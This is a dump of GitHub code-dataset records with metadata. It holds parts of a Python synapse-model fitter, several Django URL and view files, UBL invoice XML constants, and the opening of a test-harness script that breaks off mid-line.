detailed.\n \"\"\"\n format_spec, pos, verbose = _get_pos_verbosity(self, format_spec)\n disp = ['t', 'fit']\n if verbose and pos:\n disp += ['df', 'dx']\n elif verbose and not format_spec:\n disp += ['df-', 'dx-']\n templates, pre, delim, post = _frmt_vars(format_spec)\n disped = [templates[k] for k in disp]\n return pre + delim.join(disped).format(**self.info) + post\n\n def __str__(self) -> str:\n \"\"\"Printing info\"\"\"\n return self.__format__('')\n\n def __repr__(self) -> str:\n \"\"\"Accurate representation of object\"\"\"\n rpr = type(self).__name__ + \"(\\n\"\n with np.printoptions(threshold=20, precision=2):\n rpr += \" data = \"\n rpr += repr(self.data).replace(\"\\n\", \"\\n\" + \" \" * 11) + \",\\n\"\n rpr += \" model = \"\n rpr += repr(self.est).replace(\"\\n\", \"\\n\" + \" \" * 12) + \",\\n\"\n rpr += \" info = \"\n rpr += repr(self.info).replace(\", \", \",\\n\" + \" \" * 13) + \",\\n\"\n rpr += \")\"\n return rpr\n\n def calc_thresh(self) -> None:\n \"\"\"Calculate thresholds for stopping\n \"\"\"\n x_scale = _ag.default_eval(self.info['x_scale'], self.est.norm)\n y_scale = _ag.default(self.info['y_scale'], self.info['nlike'])\n self.info['x_thresh'] = self.opt.atolx + self.opt.rtolx * x_scale\n self.info['y_thresh'] = self.opt.atoly + self.opt.rtoly * y_scale\n\n def check_thresh(self) -> bool:\n \"\"\"Check if last update was below threshold\n \"\"\"\n return (self.info['dmodel'] < self.info['x_thresh'] and\n abs(self.info['dlike']) < self.info['y_thresh'])\n\n def valid(self) -> bool:\n \"\"\"Check that current model estimate is valid\"\"\"\n return not self.est.nmodel and _si.valid_values(self.est)\n\n @abc.abstractmethod\n def update_info(self) -> None:\n \"\"\"Calculate stats for termination and display.\n\n Subclass must update `self.info['nlike']` and `self.info['dlike']`.\n \"\"\"\n self.info['dmodel'] = (self.est - self.prev_est).norm()\n\n @abc.abstractmethod\n def update_fit(self) -> None:\n \"\"\"Perform a single update of the model\"\"\"\n\n @abc.abstractmethod\n def est_occ(self, ind: _ps.Inds) -> la.lnarray:\n \"\"\"Current estimate of state occupation\n\n Parameters\n ----------\n ind : Tuple[Union[int, slice], ...]\n Time, experiment indices/slices to plot\n\n Returns\n -------\n data : lnarray, ([E,]T,M) float[0:1] or ([E,]T) int[0:M]\n Estimate of state occupation\n \"\"\"\n\n def plot_occ(self, handle: _ps.Handle, ind: _ps.Inds, **kwds) -> _ps.Plot:\n \"\"\"Plot current estimate of state occupation\n\n Parameters\n ----------\n handle : Union[Axes, Image, Line]\n Axes to plot on, or Image/Lines to update with new data\n ind : Tuple[Union[int, slice], ...]\n Time, experiment indices/slices to plot\n\n Returns\n -------\n imh : Union[Image, Line]\n Image/Line objects for the plots\n \"\"\"\n # (T,M) or (T,)\n state_prob = self.est_occ(ind)\n kwds['line'] = state_prob.ndim == 1\n return _ps.set_plot(handle, state_prob.t, **kwds)\n\n def init(self) -> List[Any]:\n \"\"\"Prepare for first iteration.\n\n Returns\n -------\n output : Any\n Whatever the callback returns.\n \"\"\"\n self.info['nit'] = 0\n self.info['result'] = 0\n return self.callback(self, 0)\n\n def step(self, step_num: int) -> List[Any]:\n \"\"\"One update step\n\n Parameters\n ----------\n step_num : int\n Number of steps completed.\n\n Returns\n -------\n output : Any\n Whatever the callback returns.\n \"\"\"\n self.info['nit'] = step_num + 1\n self.prev_est = self.est.copy()\n self.update_fit()\n if not self.valid():\n self.info['result'] = -1\n return []\n self.update_info()\n self.calc_thresh()\n self.prev_est = None\n if self.check_thresh():\n self.info['result'] = 1\n return self.callback(self, 2)\n if self.info['nit'] == self.opt.max_it:\n return self.callback(self, 2)\n if self.info['nit'] % self.opt.disp_step == 0:\n return self.callback(self, 1)\n return []\n\n def run(self, callback: Optional[Callback] = None) -> int:\n \"\"\"Run the synapse fitter until termination conditions are met\n\n Parameters\n ----------\n callback : Callable[[self, int]->List], optional\n Function called on every iteration, by default `print_callback`.\n Second argument:\n 0: Before first iteration.\n 1: During iterations.\n 2: After completion.\n It should return an empty list unless it is involved in an\n animation, in which case it should return a list of updated artists\n\n Returns\n -------\n result : int\n Flag for the outcome:\n -1: Error, invalid model generated.\n 0: Failure, maximum iterations reached.\n 1: Success, change in log-likelihood and model below threshold.\n \"\"\"\n count = _it.undcount if self.opt.disp_each else _it.dcount\n self.callback = _ag.default(callback, self.callback)\n self.init()\n for i in count('iteration', self.opt.max_it,\n disp_step=self.opt.disp_step):\n self.step(i)\n if self.info['result']:\n break\n return self.info['result']\n\n @classmethod\n def rerun(cls, saved: Dict[str, la.lnarray],\n callback: Callback = print_callback, **kwds\n ) -> SynapseFitter:\n \"\"\"Recreate a fitter from its saved state.\n\n Parameters\n ----------\n saved : Dict[str, la.lnarray]\n The `info` dictionary of a `RecordingCallback`.\n callback : Callable[[self, int]->None], optional\n Function called on every iteration, by default `print_callback`.\n Second argument:\n 0: Before first iteration.\n 1: During iterations.\n 2: After completion.\n Other keywords passed to `cls`.\n\n Returns\n -------\n fitter : SynapseFitter\n The recreated fitter.\n \"\"\"\n kwds['callback'] = callback\n est = _si.from_elements(saved['est'][0], saved['frc'], saved['rdo'])\n if 'states' in saved:\n data = _ps.SimPlasticitySequence(saved['plast_type'],\n saved['readouts'],\n saved['states'])\n else:\n data = _ps.PlasticitySequence(saved['plast_type'],\n saved['readouts'])\n if 'truth' in saved:\n truth = _si.from_elements(saved['truth'], saved['frc'],\n saved['rdo'])\n kwds['truth'] = truth\n return cls(data, est, **kwds)\n\n\n# =============================================================================\n# Fitter with ground truth\n# =============================================================================\n\n\nclass GroundedFitter(SynapseFitter):\n \"\"\"SynapseFitter where groud-truth is known.\n\n Parameters\n ----------\n data : SimPlasticitySequence\n The simulated data used to fit the synapse model.\n est : SynapseIdModel\n The initial guess/current estimate of the synapse model.\n truth : SynapseIdModel\n The model used to generate `data`.\n callback : Callable[[self, int]->None], optional\n Function called on every iteration, by default `print_callback`.\n Second argument:\n 0: Before first iteration.\n 1: During iterations.\n 2: After completion.\n Other keywords added to `self.opt` (see `SynapseFitter`).\n\n Statistics\n ----------\n true_like : float\n Negative log-likelihood of `data` given `truth`.\n true_dmodel : float\n Distance between `truth` and `model`.\n true_dlike : float\n `nlike - true_like`.\n nlike : float\n Negative log-likelihood of `data` given `model`.\n dlike : float\n Decrease in negative log-likelihood of `data` given `model`.\n dmodel : float\n Distance between `model` and `prev_model`.\n nit : int\n Number of iterations.\n x_thresh : float\n Threshold on `dmodel` for termination.\n y_thresh : float\n Threshold on `dlike` for termination.\n x_scale : float or None\n Typical scale for `dmodel`. By default, `None` -> `truth.norm()`.\n y_scale : float or None\n Typical scale for `dlike`. By default, `None` -> `true_like`.\n result : int\n Flag for the outcome of fitting:\n -1: Error, invalid model generated.\n 0: Failure, maximum iterations reached.\n 1: Success, change in log-likelihood and model below threshold.\n All of the above are stored in `self.info`.\n\n See Also\n --------\n SynapseFitter.\n SynapseFitOptions.\n \"\"\"\n data: _ps.SimPlasticitySequence\n truth: _si.SynapseIdModel\n\n def __init__(self, data: _ps.SimPlasticitySequence,\n est: _si.SynapseIdModel, truth: _si.SynapseIdModel,\n callback: Callback = print_callback,\n **kwds) -> None:\n \"\"\"SynapseFitter where groud-truth is known.\n\n Parameters\n ----------\n data : SimPlasticitySequence\n The data used to fit the synapse model.\n model : SynapseIdModel\n The initial guess/current estimate of the synapse model\n truth : SynapseIdModel\n The model used to generate `data`.\n\n Subclass should set `self.info['true_like', 'y_scale', 'true_dlike']`.\n \"\"\"\n super().__init__(data, est, callback, **kwds)\n self.truth = truth\n self.info.update(true_dmodel=(self.truth - self.est).norm(),\n x_scale=self.truth.norm())\n\n def __format__(self, format_spec: str) -> str:\n \"\"\"Printing info about state of fitter\n\n Parameters\n ----------\n format_spec : str\n If it begins `'tex'`, produces a LaTeX equation environment.\n If it ends with `','`, the first digit is\n interpreted as `pos` and the second as `verbose`.\n\n For `pos`:\n 0: Before first iteration.\n 1: During itertions.\n 2: After completion.\n For `verbose`:\n 1: print summary,\n 2: print detailed.\n \"\"\"\n format_spec, pos, verbose = _get_pos_verbosity(self, format_spec)\n disp = ['t', 'tr', 'fit', 'trx']\n if not verbose and pos == 1 and not format_spec:\n del disp[1]\n if verbose and pos:\n disp += ['dtr', 'df', 'dx']\n elif verbose and format_spec:\n disp += ['dtr', 'df-', 'dx-']\n templates, pre, delim, post = _frmt_vars(format_spec)\n disped = [templates[k] for k in disp]\n return pre + delim.join(disped).format(**self.info) + post\n\n def __repr__(self) -> str:\n \"\"\"Accurate representation of object\"\"\"\n rpr = super().__repr__()\n insert = \" truth = \"\n with np.printoptions(threshold=20, precision=2):\n insert += repr(self.data).replace(\"\\n\", \"\\n\" + \" \" * 12) + \",\\n\"\n ind = rpr.find(\" info = \")\n rpr = rpr[:ind] + insert + rpr[ind:]\n return rpr\n\n def calc_thresh(self) -> None:\n \"\"\"Calculate thresholds for stopping\"\"\"\n if self.info['x_thresh'] == 0 or self.info['y_thresh'] == 0:\n super().calc_thresh()\n\n @abc.abstractmethod\n def update_info(self) -> None:\n \"\"\"Calculate info for termination.\n\n Subclass must update `self.info['nlike', 'dlike', 'true_dlike']`.\n \"\"\"\n super().update_info()\n self.info['true_dmodel'] = (self.truth - self.est).norm()\n\n\n# =============================================================================\nCallback = Callable[[SynapseFitter, int], List[Any]]\n", "repo_name": "ganguli-lab/Complex_Synapse", "sub_path": "Code/Python/complex_synapse/identify/fit_synapse.py", "file_name": "fit_synapse.py", "file_ext": "py", "file_size_in_byte": 26016, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.compile", "line_number": 27, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 34, "usage_type": "name"}, {"api_name": "numpy.isfinite", "line_number": 68, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 78, "usage_type": "name"}, {"api_name": "sl_py_tools.options_classes.Options", "line_number": 110, "usage_type": "attribute"}, {"api_name": "sl_py_tools.options_classes", "line_number": 110, "usage_type": "name"}, {"api_name": "sl_py_tools.options_classes.Attrs", "line_number": 157, "usage_type": "attribute"}, {"api_name": "sl_py_tools.options_classes", "line_number": 157, "usage_type": "name"}, {"api_name": "sl_py_tools.options_classes.Attrs", "line_number": 158, "usage_type": "attribute"}, {"api_name": "sl_py_tools.options_classes", "line_number": 158, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 243, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 253, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq.PlasticitySequence", "line_number": 333, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq", "line_number": 333, "usage_type": "name"}, {"api_name": "complex_synapse.identify.synapse_id.SynapseIdModel", "line_number": 334, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.synapse_id", "line_number": 334, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 335, "usage_type": "name"}, {"api_name": "complex_synapse.identify.synapse_id.SynapseIdModel", "line_number": 335, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.synapse_id", "line_number": 335, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 337, "usage_type": "name"}, {"api_name": "numbers.Number", "line_number": 337, "usage_type": "name"}, {"api_name": "complex_synapse.identify.plast_seq.PlasticitySequence", "line_number": 343, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq", "line_number": 343, "usage_type": "name"}, {"api_name": "complex_synapse.identify.synapse_id.SynapseIdModel", "line_number": 343, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.synapse_id", "line_number": 343, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 365, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 366, "usage_type": "attribute"}, {"api_name": "numpy.printoptions", "line_number": 407, "usage_type": "call"}, {"api_name": "sl_py_tools.arg_tricks.default_eval", "line_number": 420, "usage_type": "call"}, {"api_name": "sl_py_tools.arg_tricks", "line_number": 420, "usage_type": "name"}, {"api_name": "sl_py_tools.arg_tricks.default", "line_number": 421, "usage_type": "call"}, {"api_name": "sl_py_tools.arg_tricks", "line_number": 421, "usage_type": "name"}, {"api_name": "complex_synapse.identify.synapse_id.valid_values", "line_number": 433, "usage_type": "call"}, {"api_name": "complex_synapse.identify.synapse_id", "line_number": 433, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 435, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 443, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq.Inds", "line_number": 448, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq", "line_number": 448, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 447, "usage_type": "attribute"}, {"api_name": "numpy_linalg.lnarray", "line_number": 448, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq.Handle", "line_number": 462, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq", "line_number": 462, "usage_type": "name"}, {"api_name": "complex_synapse.identify.plast_seq.Inds", "line_number": 462, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq.set_plot", "line_number": 480, "usage_type": "call"}, {"api_name": "complex_synapse.identify.plast_seq", "line_number": 480, "usage_type": "name"}, {"api_name": "complex_synapse.identify.plast_seq.Plot", "line_number": 462, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 482, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 482, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 494, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 494, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 525, "usage_type": "name"}, {"api_name": "sl_py_tools.iter_tricks.undcount", "line_number": 547, "usage_type": "attribute"}, {"api_name": "sl_py_tools.iter_tricks", "line_number": 547, "usage_type": "name"}, {"api_name": "sl_py_tools.iter_tricks.dcount", "line_number": 547, "usage_type": "attribute"}, {"api_name": "sl_py_tools.arg_tricks.default", "line_number": 548, "usage_type": "call"}, {"api_name": "sl_py_tools.arg_tricks", "line_number": 548, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 558, "usage_type": "name"}, {"api_name": "numpy_linalg.lnarray", "line_number": 558, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.synapse_id.from_elements", "line_number": 581, "usage_type": "call"}, {"api_name": "complex_synapse.identify.synapse_id", "line_number": 581, "usage_type": "name"}, {"api_name": "complex_synapse.identify.plast_seq.SimPlasticitySequence", "line_number": 583, "usage_type": "call"}, {"api_name": "complex_synapse.identify.plast_seq", "line_number": 583, "usage_type": "name"}, {"api_name": "complex_synapse.identify.plast_seq.PlasticitySequence", "line_number": 587, "usage_type": "call"}, {"api_name": "complex_synapse.identify.plast_seq", "line_number": 587, "usage_type": "name"}, {"api_name": "complex_synapse.identify.synapse_id.from_elements", "line_number": 590, "usage_type": "call"}, {"api_name": "complex_synapse.identify.synapse_id", "line_number": 590, "usage_type": "name"}, {"api_name": "complex_synapse.identify.plast_seq.SimPlasticitySequence", "line_number": 656, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq", "line_number": 656, "usage_type": "name"}, {"api_name": "complex_synapse.identify.synapse_id.SynapseIdModel", "line_number": 657, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.synapse_id", "line_number": 657, "usage_type": "name"}, {"api_name": "complex_synapse.identify.plast_seq.SimPlasticitySequence", "line_number": 659, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.plast_seq", "line_number": 659, "usage_type": "name"}, {"api_name": "complex_synapse.identify.synapse_id.SynapseIdModel", "line_number": 660, "usage_type": "attribute"}, {"api_name": "complex_synapse.identify.synapse_id", "line_number": 660, "usage_type": "name"}, {"api_name": "numpy.printoptions", "line_number": 715, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 726, "usage_type": "attribute"}, {"api_name": "typing.Callable", "line_number": 737, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 737, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 737, "usage_type": "name"}]} +{"seq_id": "29570090272", "text": "from django.urls import path\n\nfrom photos.views import PhotoUploadApi, PhotoMetaListApi, PhotoListApi, PhotoRetrieveApi\n\n\nphoto_patterns = [\n path('photo/upload/', PhotoUploadApi.as_view(), name='photo_upload'),\n path('photo//', PhotoRetrieveApi.as_view(), name='photo'),\n path('photos/', PhotoListApi.as_view(), name='photos'),\n path('photos/detailed/', PhotoMetaListApi.as_view(), name='photos_detailed'),\n]\n\nurlpatterns = photo_patterns", "repo_name": "unkn1w/photo_manager", "sub_path": "backend/photos/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 459, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "photos.views.PhotoUploadApi.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "photos.views.PhotoUploadApi", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "photos.views.PhotoRetrieveApi.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "photos.views.PhotoRetrieveApi", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "photos.views.PhotoListApi.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "photos.views.PhotoListApi", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "photos.views.PhotoMetaListApi.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "photos.views.PhotoMetaListApi", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "36925728432", "text": "from collections import OrderedDict\n\nDEFAULT_ENCODING = \"utf-8\"\nFALLBACK_ENCODING = \"utf-8-sig\"\n\n# Constants used in naming and formatting of intermediate JSON.\nATTRIBUTE_PREFIX = \"_\"\nVALUE_ATTRIBUTE = \"__text\"\n\nATTRIBUTE = \"@{}\".format\n\n# Names of special intermediate JSON elements.\nXML_NAMESPACES = \"@xmlns\"\nTEXT_CONTENT = \"#text\"\n\n# UBL Billing 3 Invoice intermediate JSON constants.\nBILLING_NAMESPACE = (\n \"urn:cen.eu:en16931:2017#compliant#urn:fdc:peppol.eu:2017:poacc:billing:3.0\"\n)\nPROFILE_NAMESPACE = \"urn:fdc:peppol.eu:2017:poacc:billing:01:1.0\"\nINVOICE_NAMESPACE = \"urn:oasis:names:specification:ubl:schema:xsd:Invoice-2\"\nCAC_NAMESPACE = (\n \"urn:oasis:names:specification:ubl:schema:xsd:CommonAggregateComponents-2\"\n)\nCBC_NAMESPACE = \"urn:oasis:names:specification:ubl:schema:xsd:CommonBasicComponents-2\"\n\nNAMESPACE = \"{}:{{}}\".format\nCBC = NAMESPACE(\"cbc\").format\nCAC = NAMESPACE(\"cac\").format\n\nNAMESPACES = OrderedDict(\n [(\"cac\", CAC_NAMESPACE), (\"cbc\", CBC_NAMESPACE), (\"\", INVOICE_NAMESPACE)]\n)\n\nUBL_INVOICE_ROOT = OrderedDict(\n [\n (\n \"Invoice\",\n OrderedDict(\n [\n (XML_NAMESPACES, NAMESPACES),\n (CBC(\"CustomizationID\"), BILLING_NAMESPACE),\n (CBC(\"ProfileID\"), PROFILE_NAMESPACE),\n ]\n ),\n )\n ]\n)\n\n\nCBC_ELEMENTS = (\n \"AccountingCost\",\n \"ActualDeliveryDate\",\n \"AdditionalStreetName\",\n \"AllowanceChargeReason\",\n \"AllowanceChargeReasonCode\",\n \"AllowanceTotalAmount\",\n \"Amount\",\n \"BaseAmount\",\n \"BaseQuantity\",\n \"BuyerReference\",\n \"ChargeIndicator\",\n \"ChargeTotalAmount\",\n \"CityName\",\n \"CompanyID\",\n \"CompanyLegalForm\",\n \"CountrySubentity\",\n \"CustomizationID\",\n \"Description\",\n \"DocumentCurrencyCode\",\n \"DocumentDescription\",\n \"DocumentType\",\n \"DocumentTypeCode\",\n \"DueDate\",\n \"ElectronicMail\",\n \"EmbeddedDocumentBinaryObject\",\n \"EndDate\",\n \"EndpointID\",\n \"HolderName\",\n \"ID\",\n \"IdentificationCode\",\n \"InvoicedQuantity\",\n \"InvoiceTypeCode\",\n \"IssueDate\",\n \"Line\",\n \"LineExtensionAmount\",\n \"LineID\",\n \"MultiplierFactorNumeric\",\n \"Name\",\n \"NetworkID\",\n \"Note\",\n \"PayableAmount\",\n \"PayableRoundingAmount\",\n \"PaymentID\",\n \"PaymentMeansCode\",\n \"Percent\",\n \"PostalZone\",\n \"PrepaidAmount\",\n \"PriceAmount\",\n \"PrimaryAccountNumberID\",\n \"ProfileID\",\n \"RegistrationName\",\n \"SalesOrderID\",\n \"StartDate\",\n \"StreetName\",\n \"TaxableAmount\",\n \"TaxAmount\",\n \"TaxCurrencyCode\",\n \"TaxExclusiveAmount\",\n \"TaxExemptionReason\",\n \"TaxExemptionReasonCode\",\n \"TaxInclusiveAmount\",\n \"TaxPointDate\",\n \"Telephone\",\n \"URI\",\n \"Value\",\n)\n", "repo_name": "dimitern/json_to_ubl_xml_transformer", "sub_path": "json_to_ubl_xml_transformer/constants.py", "file_name": "constants.py", "file_ext": "py", "file_size_in_byte": 2759, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.OrderedDict", "line_number": 31, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 35, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "14261068938", "text": "from django.urls import include, path\nfrom rest_framework.routers import DefaultRouter\nfrom users.views import SpecialUserViewSet\nfrom cookbook.views import (DownloadShoppingCartViewSet,\n FavoriteRecipesViewSet, IngredientViewSet,\n RecipesViewSet, SbscrptViewSet,\n ShoppingCartViewSet, SubscribeViewSet, TagViewSet)\n\napp_name = 'cookbook'\n\nrouter = DefaultRouter()\nrouter.register(\n 'users/subscriptions',\n SbscrptViewSet,\n basename='subscriptions'\n)\nrouter.register('users', SpecialUserViewSet, basename='users-list')\nrouter.register('tags', TagViewSet, basename='tags-list')\nrouter.register('ingredients', IngredientViewSet, basename='ingredients-list')\nrouter.register(\n r'users/(?P\\d+)/subscribe',\n SubscribeViewSet,\n basename='subscribe'\n)\nrouter.register(\n 'recipes/download_shopping_cart',\n DownloadShoppingCartViewSet,\n basename='download_shopping_cart'\n)\nrouter.register(\n r'recipes/(?P\\d+)/shopping_cart',\n ShoppingCartViewSet,\n basename='shopping_cart'\n)\nrouter.register(\n r'recipes/(?P\\d+)/favorite',\n FavoriteRecipesViewSet,\n basename='favorite'\n)\nrouter.register('recipes', RecipesViewSet, basename='recipes-list')\n\n\nurlpatterns = [\n path('', include(router.urls)),\n path('auth/', include('djoser.urls.authtoken')),\n]\n", "repo_name": "Gena40/foodgram-project-react", "sub_path": "backend/food_assistance/cookbook/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1376, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 11, "usage_type": "call"}, {"api_name": "cookbook.views.SbscrptViewSet", "line_number": 14, "usage_type": "argument"}, {"api_name": "users.views.SpecialUserViewSet", "line_number": 17, "usage_type": "argument"}, {"api_name": "cookbook.views.TagViewSet", "line_number": 18, "usage_type": "argument"}, {"api_name": "cookbook.views.IngredientViewSet", "line_number": 19, "usage_type": "argument"}, {"api_name": "cookbook.views.SubscribeViewSet", "line_number": 22, "usage_type": "argument"}, {"api_name": "cookbook.views.DownloadShoppingCartViewSet", "line_number": 27, "usage_type": "argument"}, {"api_name": "cookbook.views.ShoppingCartViewSet", "line_number": 32, "usage_type": "argument"}, {"api_name": "cookbook.views.FavoriteRecipesViewSet", "line_number": 37, "usage_type": "argument"}, {"api_name": "cookbook.views.RecipesViewSet", "line_number": 40, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 44, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 44, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 45, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "75010861633", "text": "from django.shortcuts import render\nfrom .models import Product, Category\n\n\ndef home(request, category_slug=None):\n if category_slug != None:\n category_page = Category.objects.get(slug=category_slug)\n products = Product.objects.filter(category=category_page, available=True)\n else:\n category_page = None\n products = Product.objects.all()\n context = {\"products\": products, \"category_page\": category_page}\n return render(request, \"products/home.html\", context)\n\n\ndef product(request, category_slug, product_slug):\n product = Product.objects.get(category__slug=category_slug, slug=product_slug)\n context = {\"product\": product}\n return render(request, \"products/product.html\", context)\n\n\ndef search(request):\n products = Product.objects.filter(name__contains=request.GET[\"name\"])\n context = {\"products\": products}\n return render(request, \"products/home.html\", context)\n", "repo_name": "tonyvives/django_store", "sub_path": "products/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 923, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "models.Category.objects.get", "line_number": 7, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 7, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 7, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 8, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 8, "usage_type": "name"}, {"api_name": "models.Product.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 11, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Product.objects.get", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 17, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 23, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "30334494059", "text": "\"\"\" chill.py:\r\n Description: relax and chill the library is fine\r\n\r\n Created by : Daniel Jaramillo\r\n Creation Date: 11/01/2019\r\n Modified by: Date:\r\n All rights(C) reserved to Teoco\r\n\"\"\"\r\nimport os\r\nimport sys\r\nimport argparse\r\nimport os_tools\r\nimport base64\r\nimport glob\r\nimport time\r\nfrom HlxTools import HlxTools\r\nfrom LoggerInit import LoggerInit\r\nfrom Partrans import Partrans\r\nfrom threading import Thread\r\nfrom TestReport import TestReportJunit\r\nfrom datetime import datetime\r\nfrom ParseHLD import ParseHLD\r\n\r\n\r\ndef parse_args():\r\n \"\"\"\r\n Parse input arguments\r\n \"\"\"\r\n global conf_file\r\n app_logger=logger.get_logger(\"parse_args\")\r\n parser = argparse.ArgumentParser()\r\n\r\n parser.add_argument('-c','--conf',\r\n \thelp='Configuration Json file',\r\n \trequired=True,\r\n \ttype=str)\r\n\r\n args=parser.parse_args()\r\n conf_file=args.conf\r\n\r\n if not os.path.exists(conf_file):\r\n app_logger.error('{conf_file} not found'.format(conf_file=conf_file))\r\n sys.exit(1)\r\n\r\ndef main():\r\n app_logger=logger.get_logger(\"main\")\r\n global conf_file\r\n parse_args()\r\n\r\n DB_USER=os.environ['DB_USER']\r\n DB_PASSWORD=base64.b64decode(os.environ['DB_PASSWORD'])\r\n ORACLE_SID=os.environ['ORACLE_SID']\r\n DB_HOST=os.environ['DB_HOST']\r\n\r\n partrans=Partrans(conf_file,DB_USER,DB_PASSWORD,ORACLE_SID,DB_HOST) \r\n #Parse hld\r\n parse_hld=ParseHLD(partrans.configuration['HLD'])\r\n parse_hld.load_hld()\r\n #Parse and transform data\r\n partrans.parse_data(parse_hld)\r\n\r\n #Simulate Data using helix\r\n LIBRARY_NAME=partrans.configuration['library']\r\n MASK=partrans.configuration['input_rd_mask']\r\n LOCAL_DIR=partrans.configuration['input_rd']\r\n INSTANCE_ID=\"1717\"\r\n curr_datetime=datetime.now().strftime(\"%Y_%m_%d_%H_%M\")\r\n\r\n\r\n TEST_REPORT_FILE_JUNIT=\"test_reports/{LIBRARY_NAME}_test_report.xml\"\\\r\n .format(curr_datetime=curr_datetime,LIBRARY_NAME=LIBRARY_NAME)\r\n\r\n #Validate environment variables\r\n if 'DVX2_IMP_DIR' not in os.environ:\r\n app_logger.error('DVX2_IMP_DIR env variable not defined')\r\n sys.exit(1)\r\n DVX2_IMP_DIR=os.environ['DVX2_IMP_DIR']\r\n if 'DVX2_LOG_DIR' not in os.environ:\r\n app_logger.error('DVX2_LOG_DIR env variable not defined')\r\n sys.exit(1)\r\n DVX2_LOG_DIR=os.environ['DVX2_LOG_DIR']\r\n DVX2_LOG_FILE=os.path.join(DVX2_LOG_DIR,\\\r\n \"dvx2_{LIBRARY_NAME}_{INSTANCE_ID}.log\"\\\r\n .format(LIBRARY_NAME=LIBRARY_NAME,INSTANCE_ID=INSTANCE_ID))\r\n #Make log file empty\r\n open(DVX2_LOG_FILE, 'w').close()\r\n #Validate if Library exists\r\n connect_file=os.path.join(DVX2_IMP_DIR,'scripts',LIBRARY_NAME+'.connect')\r\n 